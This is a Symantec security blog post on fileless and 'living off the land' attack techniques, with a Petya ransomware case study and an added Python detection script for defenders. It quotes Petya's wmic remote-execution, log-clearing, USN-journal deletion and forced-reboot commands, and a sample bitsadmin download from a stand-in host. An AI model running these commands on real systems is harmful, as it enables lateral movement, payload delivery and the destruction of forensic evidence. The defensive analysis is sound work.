Symantec Security Response - Attackers are increasingly living off the land
The use of fileless threats and dual-use tools by attackers is becoming more common
There is increasing discussion of threats that adopt so-called “living off the land” tactics. Attackers are
increasingly making use of tools already installed on targeted computers, or are running simple scripts and shellcode
directly in memory. Creating fewer new files on the hard disk, or being completely fileless, means less chance of being
detected by traditional security tools and therefore minimises the risk of an attack being blocked. Using simple and
clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.
Living off the land tactics are increasingly being adopted by cyber criminals and are used in almost every targeted
attack.
There are four main categories falling under the umbrella of living off the land:
• Dual-use tools, such as PsExec, which are used by the attacker
• Memory only threats, such as the Code Red worm
• Fileless persistence, such as VBS in the registry
• Non-PE file attacks, such as Office documents with macros or scripts
We also see slight variations on these tactics, such as using BITSAdmin in macros to download a malicious payload, or
hiding a PowerShell script that is triggered through an SCT file referenced in a registry run key. In some cases, stolen
data is then exfiltrated through legitimate cloud services, hiding the event in normal traffic patterns.
Figure 1. Typical living off the land attack chain
Case study: June 27 Petya outbreak
The Ransom.Petya outbreak, which hit organisations in Ukraine and many other countries on June 27, is a good example of an attack
using living off the land tactics.
The ransomware exhibited some wiper characteristics and immediately gained the attention of both security experts
and the media as it was, among other things, exploiting the SMB EternalBlue vulnerability just like the headline-grabbing
WannaCry (Ransom.WannaCry) did one month earlier. The threat made use of a clever supply chain attack as its initial infection vector by
compromising the update process of a widely used accounting software program.
In addition, Petya made heavy use of system commands during the infection process. Once executed, Petya
drops a recompiled version of LSADump from Mimikatz in 32-bit and 64-bit variants, which is used to dump credentials
from Windows memory. The account credentials are then used to copy the threat to the Admin$ share of any computers the
threat finds on the network. Once the threat accesses a remote system it executes itself remotely using a dropped
instance of PsExec.exe and the Windows Management Instrumentation (WMI) command line tool wmic.exe:
wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"
In order to cover its tracks on the compromised computer, the threat clears various system logs using the wevtutil and
fsutil commands:
wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
Petya then creates a scheduled task so that the computer restarts into the modified MBR and performs the final
encryption task:
schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 14:42
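The three command lines above, together with the BITSAdmin-from-macro variation mentioned earlier, are exactly the kind of activity that process-creation logging (Sysmon Event ID 1 or Windows Security 4688) makes visible. As an added defender-side example, which is not Symantec's code and not part of the original post, the following Python detection logic runs pattern rules for those commands over a handful of constructed process-creation records. The record field names, host names, IP address and file paths are assumptions; the command-line patterns follow the commands quoted in the case study.

```python
import re

# Constructed process-creation records (assumed field names: host, parent,
# image, cmdline). In practice these come from Sysmon Event ID 1 or Windows
# Security 4688 events; every value below is an illustrative sample.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\alice\\notes.txt"},
    {"host": "ws01", "parent": "rundll32.exe", "image": "wmic.exe",
     "cmdline": 'wmic.exe /node:10.0.0.7 /user:ACME\\svc /password:[REDACTED] '
                'process call create "C:\\Windows\\System32\\rundll32.exe '
                '\\"C:\\Windows\\perfc.dat\\" #1 60"'},
    {"host": "ws01", "parent": "cmd.exe", "image": "wevtutil.exe",
     "cmdline": "wevtutil cl Security"},
    {"host": "ws01", "parent": "cmd.exe", "image": "fsutil.exe",
     "cmdline": "fsutil usn deletejournal /D C:"},
    {"host": "ws01", "parent": "rundll32.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /RU "SYSTEM" /Create /SC once /TN "" '
                '/TR "C:\\Windows\\system32\\shutdown.exe /r /f" /ST 14:42'},
    {"host": "ws02", "parent": "winword.exe", "image": "bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high "
                "http://example.invalid/p.bin C:\\Users\\bob\\p.bin"},
    {"host": "ws03", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    # Benign administrative use: a scheduled backup job, no forced reboot.
    {"host": "ws03", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /Create /SC daily /TN backup /TR "C:\\tools\\backup.exe"'},
]

# Each rule: (name, parent-image regex or None, image regex, command-line regex).
# Patterns mirror the commands quoted in the Petya case study above.
RULES = [
    ("remote_wmic_process_create", None, r"^wmic(\.exe)?$",
     r"/node:\S+.*\bprocess\s+call\s+create\b"),
    ("event_log_cleared", None, r"^wevtutil(\.exe)?$", r"\bcl\s+\w+"),
    ("usn_journal_deleted", None, r"^fsutil(\.exe)?$", r"\busn\s+deletejournal\b"),
    ("scheduled_forced_reboot", None, r"^schtasks(\.exe)?$",
     r"/create\b.*shutdown(\.exe)?\b.*/r\b.*/f\b"),
    ("office_spawned_bitsadmin", r"^(winword|excel|powerpnt)(\.exe)?$",
     r"^bitsadmin(\.exe)?$", r"/transfer\b"),
]


def detect(events):
    """Return (host, rule_name, cmdline) for every event that matches a rule.

    Matching is case-insensitive because Windows command lines are.
    """
    hits = []
    for ev in events:
        for name, parent_re, image_re, cmd_re in RULES:
            if parent_re and not re.search(parent_re, ev["parent"], re.I):
                continue
            if not re.search(image_re, ev["image"], re.I):
                continue
            if not re.search(cmd_re, ev["cmdline"], re.I):
                continue
            hits.append((ev["host"], name, ev["cmdline"]))
    return hits


PETYA_CHAIN = ("remote_wmic_process_create", "event_log_cleared",
               "usn_journal_deleted", "scheduled_forced_reboot")


def hosts_with_chain(events, required=PETYA_CHAIN):
    """Hosts on which every rule in `required` fired.

    Any one of these tools has legitimate admin uses; the full sequence on a
    single host is far more suspicious than an isolated hit.
    """
    seen = {}
    for host, name, _ in detect(events):
        seen.setdefault(host, set()).add(name)
    return sorted(h for h, names in seen.items() if set(required) <= names)


if __name__ == "__main__":
    for host, rule, cmd in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {cmd}")
    print("hosts showing the full chain:", hosts_with_chain(SAMPLE_EVENTS))
```

The per-rule hits are useful on their own, but the `hosts_with_chain` correlation is what separates an attack pattern from the routine log clearing or scheduled reboots that administrators also perform; tuning these rules against known-good admin activity is the main work of deploying them.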
This case is a classic example of system tools being used during an attack. Many system administrators are now looking
into disabling remote PsExec execution or restricting WMI access in order to defend against the same attack pattern in
the future.
Malware using WMI is not a new occurrence. Last year we observed an average of two percent of analysed malware samples
making use of WMI for nefarious purposes, and the upward trend is clearly continuing.
Figure 2. Percentage of malware using WMI
System tools used for reconnaissance
Besides being used for lateral movement, it is also very common for targeted attack groups to use system tools for
reconnaissance. Out of the 10 targeted attack groups that we looked at, all of them made use of system tools to explore
compromised environments.
Table. The 10 attack groups Symantec looked at and the system tools they used
Mitigation
Preventing infection in the first place is by far the best strategy. Since email and infected websites are still the
most common infection vectors for malware, adopting a robust defence against both of these will help reduce the risk of
infection. In addition, best practices for segregation of networks, extensive logging (including the use of system tools), and a
least-privilege approach should be assessed for larger networks.
Symantec has various protection features in place in the network and on the endpoint to protect against fileless threats
and living off the land attacks. For example, our memory exploit mitigation (MEM) techniques can proactively block
remote code execution (RCE) exploits, our heuristic-based memory scanning can detect memory only threats, and Symantec’s
behaviour-based detection engine SONAR can detect malicious usage of dual-use tools and block them.
For more details, read our white paper: Living off the land and fileless attack techniques